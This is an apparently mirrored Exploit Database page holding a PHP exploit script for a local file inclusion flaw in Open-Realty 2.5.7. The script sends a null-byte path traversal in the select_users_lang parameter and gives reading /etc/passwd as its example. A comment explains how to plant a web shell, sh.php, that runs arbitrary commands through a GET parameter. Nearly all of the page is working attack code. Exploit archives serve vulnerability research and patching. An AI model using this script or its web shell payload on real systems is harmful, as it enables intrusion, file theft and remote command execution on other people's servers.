Open-Realty 2.5.7 – Local File Disclosure

• Exploit Database
• 200 阅读

• 作者： Nikola Petrov
  日期： 2010-08-18
• 类别：

  • webapps
  平台：

  • php
• 来源：https://www.exploit-db.com/exploits/14684/
• 1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 46 47 48 49 50 51 52 53 54 55 56 57 58 59 60 61 62 63 64 65

  <?php /* * Exploit Title: * Date: 2010-08-18 * Author: Nikola Petrov * Vendor: http://open-realty.org/ * Version: 2.5.7 */ /* vulnerable: Open-Realty 2.5.7 LFI: /index.php upload image with: <?php system("echo \"<?php if(isset(\$_GET[\"cmd\"])) system(\$_GET[\"cmd\"]); ?>\" > sh.php"); ?> include the image and sh.php will be generated. proceed with sh.php   MAGIC_QUOTES must be &apos;off&apos; and %00 must not be replaced with \0. */   print "\n\n#########################################################################\n"; print "#LFI discovery and implementation: Nikola Petrov (vp.nikola@gmail.com)\n"; print "#Date: 05.09.2009\n"; print "#########################################################################\n\n";   if($argc < 5) { print "usage: $argv[0] host port path file [debug: 1/0]\n"; print "example: $argv[0] localhost 80 / ../../../../../../../../../../../../etc/passwd\n\n\n"; exit(); }   $Host = $argv[1]; $Port = $argv[2]; $Path = $argv[3]; $File = $argv[4];   function HttpSend($aHost, $aPort, $aPacket) { $Response = "";   if(!$Socket = fsockopen($aHost, $aPort)) { print "Error connecting to $aHost:$aPort\n\n"; exit(); } fputs($Socket, $aPacket); while(!feof($Socket)) $Response .= fread($Socket, 1024); fclose($Socket); return $Response; }   $VulnRequest = "select_users_lang=". $File . "%00"; $Packet= "POST {$Path} HTTP/1.1\r\n"; $Packet .= "Host: {$Host}\r\n"; $Packet .= "Content-Type: application/x-www-form-urlencoded\r\n"; $Packet .= "Content-Length: " . strlen($VulnRequest) . "\r\n\r\n"; $Packet .= "$VulnRequest\n";   if($argv[5] == 1) print $Packet;   print HttpSend($Host, $Port, $Packet); ?>